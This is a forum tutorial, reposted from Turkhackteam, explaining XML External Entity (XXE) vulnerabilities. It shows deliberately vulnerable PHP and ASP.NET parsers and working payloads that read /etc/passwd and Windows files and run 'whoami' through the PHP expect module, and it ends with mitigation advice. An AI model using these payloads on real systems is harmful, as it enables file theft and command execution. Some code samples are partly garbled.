What is XXE Vulnerability?

swarq

Katılımcı Üye
1 May 2020
333
184
Beacon Hills


XXE is a feature that is not new but comes to the agenda with its presence on the servers of a social media giant like Facebook. In fact, although XML is a feature that is thought to increase its flexibility, this flexibility accompanies along with important security risks, It enables random file reading from the server and to run commands on the server in some special cases.

XXE vulnerability is triggered, while the server (software running on the server-side) do parse XML data, the result of calling a specially defined XML entity (entity). Some XML libraries allow privately entity definition and call by default, while others have this feature turned off. In order for the attack to be successful, this feature must be active on the target system.

XXE scenario with PHP:

PicsArt_04-18-08.53.25.png


In the example scenario, there is a simple PHP code that did parse the XML data coming from the server-side and prints it on the screen.


Code:

<?php$xml = simplexml_load_string(file_get_contents(“php://input”));echo $xml;?>

When a POST request containing a simple XML asset is sent to the server (the HttpRequester tool is used in the example), the value of the asset will be return as response.

Code:

<?xml version=”1.0″ ?><tag>test</tag>

For example, the answer "test" will return to the above request. The problem, as always, arises in situations where the request is not so innocent. For example, when an entity is defined and used to read the content of a file in the request to the server, the request will anew be successful.

Code:

<?xml version=”1.0″?><!DOCTYPE tag [<!ENTITY ups SYSTEM “file:///etc/passwd”>]><tag>&ups;</tag>

For example, when the above XML is sent to the server, the content of the server's "/ etc / passwd" file returns. The file whose content is trying to be read may affect the XML file structure or something else in the application, due to the characters it contains. If the target application is developed with PHP as in the example, to encode the file content as base64; that payload can be used.


Code:

xml version=”1.0″?><!DOCTYPE tag [<!ENTITY ups SYSTEM “php://filter/read=convert.base64-encode/resource=/etc/passwd”>]><tag>&ups;</tag>

The returned answer is decoded with base64 to access the contents of the file. As with other random file read vulnerabilities, it may be possible to run a command on the target server by using XXE in some special cases. For example, if the target application is PHP and PHP's "expect" (PECL :: Package :: expect) module is installed ...

Code:

<?xml version=”1.0″?><!DOCTYPE tag [<!ENTITY ups SYSTEM “expect://whoami”>]><tag>&ups;</tag>

"Whoami" command can be run on the system by using ... payload.

XXE Scenario with ASP.NET:

PicsArt_04-18-08.54.15.png


Below code is used on the server side to exemplify XXE vulnerability with ASP.NET and C #.

Code:

protected **** Page_Load(object sender, EventArgs e){XmlReaderSettings xrSettings = new XmlReaderSettings();xrSettings.DtdProcessing = DtdProcessing.Parse;X******** ******** = X********.Load(XmlReader.Create(Request.InputStream, xrSettings));Response.Write(********.ToString());}


In short, an XmlReader object is created that reads the contents of the POST request via Request.InputStream, and this object is X ********. It is given as a parameter to the Load method and the xml data is doing parse. The "DtdProcessing" property of the used XmlReaderSettings object is assigned as "DtdProcessing.Parse" is ensuring interpret DTD / DOCTYPE personnel in XML.

An ordinary XML sent to the server ...

Code:

<?xml version=”1.0″?><tag>test</tag>

involved XXE payload a XML ...

Code:

<?xml version=”1.0″?><!DOCTYPE tag [<!ENTITY ups SYSTEM “file://C:Windowssystem.ini”>]><tag>&ups;</tag>

SSRF Attack with XXE

To perform an SSRF attack and exploit the XXE vulnerability, we need to define an external XML asset using the URL we target and use the defined asset in a data value. If we can use the defined entity in a data value returned in the application's response, we will be able to see the response from the URL in the application's response, and thus gain two-way interaction in the backend.

Blind XXE

Many examples of XXE vulnerabilities are blind. This means that the application does not return the value of any external entities defined in its responses, so it is not possible to directly import server-side files. Blind XXE vulnerabilities can still be detected and used, but more advanced techniques may be required.

PicsArt_04-18-08.52.42.md.jpg


Precautions for XXE Vulnerability

It is recommended not to run a version under the XML processor and its libraries should always be at the latest version, turn off the XML External Entity feature of all XML parsers in the application, and use a filtering system such as "Whitelist". The easiest and most effective way to prevent XXE attacks is to disable these features. It is also recommended to disable XInclude support.

Source:https://www.turkhackteam.org/siber-guvenlik/1979333-xxe-zafiyeti-nedir.html
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.